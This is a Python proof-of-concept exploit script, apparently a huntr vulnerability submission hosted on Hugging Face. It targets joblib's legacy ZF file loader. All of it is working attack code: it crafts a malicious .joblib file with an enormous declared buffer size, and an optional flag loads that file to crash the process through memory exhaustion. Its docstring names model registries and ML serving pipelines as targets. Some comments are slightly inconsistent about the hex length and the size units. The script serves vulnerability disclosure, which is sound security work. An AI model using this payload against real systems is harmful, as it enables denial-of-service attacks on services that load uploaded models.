joblib-zf-dos-poc / poc_exploit.py
Rodion111's picture
Upload poc_exploit.py with huggingface_hub
3d161da verified
#!/usr/bin/env python3
"""
PoC: Joblib ZF Header DoS β€” Unbounded Memory Allocation in read_zfile()
CVE: TBD | CWE-770 | CVSS 7.5
Vulnerability:
joblib/numpy_pickle_compat.py β€” read_zfile() reads the declared buffer size
from the ZF file header as a 19-character hex string, then passes it
directly to zlib.decompress() as the `bufsize` argument β€” NO bounds check:
_ZFILE_PREFIX = b'ZF'
_MAX_LEN = 19 # hex digits
length = file_handle.read(len(_ZFILE_PREFIX) + _MAX_LEN)
length = length[len(_ZFILE_PREFIX):] # strip 'ZF' prefix
length = int(length, 16) # attacker-controlled!
data = zlib.decompress(file_handle.read(), 15, length)
# ↑ zlib pre-allocates `length` bytes before decompressing
# With length=0x7FFFFFFFFFFFFFFF β†’ 9.2 EB allocation attempt β†’ CRASH
The crash happens BEFORE any Pickle deserialization β€” bypasses
all joblib Pickle safety settings (trusted=True, etc.).
Attack surface:
Any code that calls joblib.load() on untrusted .joblib files:
- ML pipelines loading user-supplied models
- Model registries accepting external uploads
- scikit-learn model serving
Usage:
python3 poc_exploit.py # generates malicious.joblib
python3 poc_exploit.py --trigger # also triggers the crash via joblib.load()
Author: security research (huntr.com submission)
"""
import struct
import sys
import os
import io
# ZF format constants (from joblib/numpy_pickle_compat.py)
_ZFILE_PREFIX = b'ZF' # magic prefix
_MAX_LEN = 19 # hex string length for declared size
OUTPUT_FILE = 'malicious_zf.joblib'
def create_malicious_zf_joblib(declared_size: int = 0x7FFFFFFFFFFFFFFF) -> bytes:
"""
Craft a minimal ZF-format joblib file with a huge declared buffer size.
Actual ZF file layout (joblib/numpy_pickle_compat.py):
Bytes 0-1: b'ZF' ← _ZFILE_PREFIX
Bytes 2-20: 19-char hex string ← declared size (attacker-controlled)
Bytes 21+: zlib-compressed payload ← actual data (ignored β€” crash happens first)
joblib parses this as:
length = int(file_data[2:21], 16)
data = zlib.decompress(rest, 15, length) # ← pre-allocates `length` bytes!
"""
import zlib
# Format declared_size as 19-character hex string (zero-padded)
size_hex = f"{declared_size:019x}".encode() # e.g. b'007fffffffffffffff'
assert len(size_hex) == _MAX_LEN
# Minimal valid zlib stream (crash happens during pre-allocation, before decompress)
compressed_payload = zlib.compress(b'\x00')
payload = _ZFILE_PREFIX + size_hex + compressed_payload
print(f"[*] Crafted ZF .joblib file:")
print(f" Format : {_ZFILE_PREFIX.decode()} + {_MAX_LEN}-char hex size")
print(f" Size hex: {size_hex.decode()}")
print(f" Declared: {declared_size:#x} = {declared_size:,} bytes (~{declared_size/2**40:.1f} TiB)")
print(f" File size: {len(payload)} bytes (crash before decompression)")
return payload
def main():
trigger = '--trigger' in sys.argv
# Generate the malicious file
payload = create_malicious_zf_joblib()
with open(OUTPUT_FILE, 'wb') as f:
f.write(payload)
print(f"[+] Malicious file written: {OUTPUT_FILE} ({os.path.getsize(OUTPUT_FILE)} bytes)")
if trigger:
print("\n[*] Triggering via joblib.load()...")
try:
import joblib
print(f" joblib version: {joblib.__version__}")
result = joblib.load(OUTPUT_FILE)
print(f"[-] Unexpected success: {result}")
except MemoryError as e:
print(f"[+] CRASH CONFIRMED: MemoryError")
print(f" zlib.decompress(data, 15, {0x7FFFFFFFFFFFFFFF:,}) pre-allocated ~9.2 EB")
print(f" Error: {e}")
except Exception as e:
name = type(e).__name__
if 'memory' in str(e).lower() or 'alloc' in str(e).lower():
print(f"[+] CRASH CONFIRMED: {name}: {e}")
else:
print(f"[~] Exception (check manually): {name}: {e}")
else:
print(f"\n[i] Run with --trigger to demonstrate the crash via joblib.load()")
print(f" python3 {sys.argv[0]} --trigger")
if __name__ == '__main__':
main()